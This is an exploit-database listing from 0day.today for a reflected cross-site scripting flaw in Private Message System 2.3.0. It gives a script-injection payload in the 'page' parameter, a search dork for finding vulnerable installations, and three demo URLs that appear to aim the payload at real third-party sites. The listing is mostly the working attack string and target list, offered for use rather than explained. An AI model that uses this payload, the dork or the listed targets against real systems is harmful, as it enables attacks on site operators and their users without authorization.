[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Private Message System 2.3.0 <= XSS Vulnerability

Author
GoLd_M
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19994
Category
web applications
Date add
17-12-2012
Platform
php
# Exploit Title: Private Message System 2.3.0 <= XSS Vulnerability
# Date: 17/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/وَذَكِّـــرْ/337878286310383)
# Vendor: http://sourceforge.net/projects/pmsys/
# Version: 2.3.0
# Category:: XSS Vulnerability
# Google Dork: PMS 2.3.0 © PMS Dev Team 2001 - 2012. 
# Tested on: Xp SP 2
# Ex :[Private Message System 2.3.0]/index.php?page="><script>alert(1337);</script>
# Test : http://upload.traidnt.net/upfiles/4ul41244.jpg
# Demo:
# 01 :http://ptl.su/pms/index.php?page="><script>alert(1337);</script>
# 02 :http://qgcomedyshow.freehostia.com/community/mail/index.php?page="><script>alert(1337);</script>
# 03 :http://anti-spam-man.com/pmsys/pmsys-2.3.0/index.php?page="><script>alert(1337);</script>

#  0day.today [2024-11-16]  #